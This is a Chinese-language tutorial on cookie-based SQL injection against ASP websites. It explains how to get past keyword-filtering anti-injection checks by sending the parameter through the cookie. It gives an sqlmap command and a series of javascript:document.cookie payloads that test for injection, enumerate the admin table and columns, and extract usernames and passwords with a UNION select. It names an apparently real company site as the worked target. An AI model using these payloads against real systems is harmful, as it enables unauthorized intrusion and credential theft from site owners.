cookie注入解析

0x01 SQL注入错误提醒标志
当尝试加入单引号注入时,出现防注入提醒:
传参错误! 参数'的值中包含非法字符串!
请不要在参数中出现:and update delete insert mid master
等非法字符!
此时可以可尝试cookie中转注入。
0x02 cookie中转注入方法
遇见此种情况,可以本地搭建环境进行cookie中转注入,也可使用sqlmap进行一键cookie中转注入,具体参数:
sqlmap -u "http://www.xxx.com/CompHonorBig.asp" --cookie "id=2" --level 2
解析:将CompHonorBig?id=2,拆分为--cookie和"id=2",并添加level 2注入级别。
此后的注入与Mysql MsSQL Access大同小异。
0x03 cookie注入详解(耐心看)
原理:程序在使用request对象获取数据的时候并未指明具体使用什么方法来获取,而是直接使用request("xx")的方式
注入点:http://www.weida-mc.com/shownews.asp?id=279
我们每一次访问http://www.weida-mc.com/shownews.asp 再需要刷新一下(按F5)
判断是否有注入:
javascript:alert(document.cookie="id="+escape("279 and 1=1"))
javascript:alert(document.cookie="id="+escape("279 and 1=2"))
判断表:
javascript:alert(document.cookie="id="+escape("279 and 0<>(select count(*) from admin)"));
判断字段(列):javascript:alert(document.cookie="id="+escape("279 and 0<>(select count(username) from admin)"));
判断字段数:
javascript:alert(document.cookie="id="+escape("279 order by N"));
javascript:alert(document.cookie="id="+escape("279 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin)"));